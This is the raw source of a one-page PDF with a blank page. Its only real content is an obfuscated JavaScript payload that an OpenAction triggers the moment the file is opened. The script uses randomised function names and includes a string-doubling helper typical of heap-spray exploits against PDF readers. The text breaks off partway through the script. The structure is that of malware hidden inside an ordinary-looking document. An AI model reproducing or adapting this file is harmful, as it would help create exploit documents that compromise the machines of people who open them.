%PDF-1.3
%‚„œ”
1 0 obj
<</OpenAction <</JS (this.VXIi0FND\(\))
/S /JavaScript
>>
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
>>
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
>>
endobj
3 0 obj
<</Count 0
/Type /Outlines
>>
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Count 1
/Type /Pages
>>
endobj
6 0 obj
<<>>
endobj
5 0 obj
<</Fields []
>>
endobj
7 0 obj
<</JavaScript 10 0 R
>>
endobj
2 0 obj
[]
endobj
11 0 obj
<</Length 31
>>
stream
0 0 595.28000 841.89000 re W n

endstream
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/Resources 8 0 R
/TrimBox [0 0 595.28000 841.89000]
/MediaBox [0 0 595.28000 841.89000]
/pdftk_PageNum 1
/Contents 11 0 R
/Type /Page
>>
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
endobj
12 0 obj
<</Length 5592
>>
stream
function VXIi0FND(){var RCWh3Mo = new Array();
function pojn(T4Kt5, Epd2F0E){while (T4Kt5.length*2<Epd2F0E) {T4Kt5 += T4Kt5;}T4Kt5 = T4Kt5.substring(0,Epd2F0E/2);return T4Kt5;}
function kSF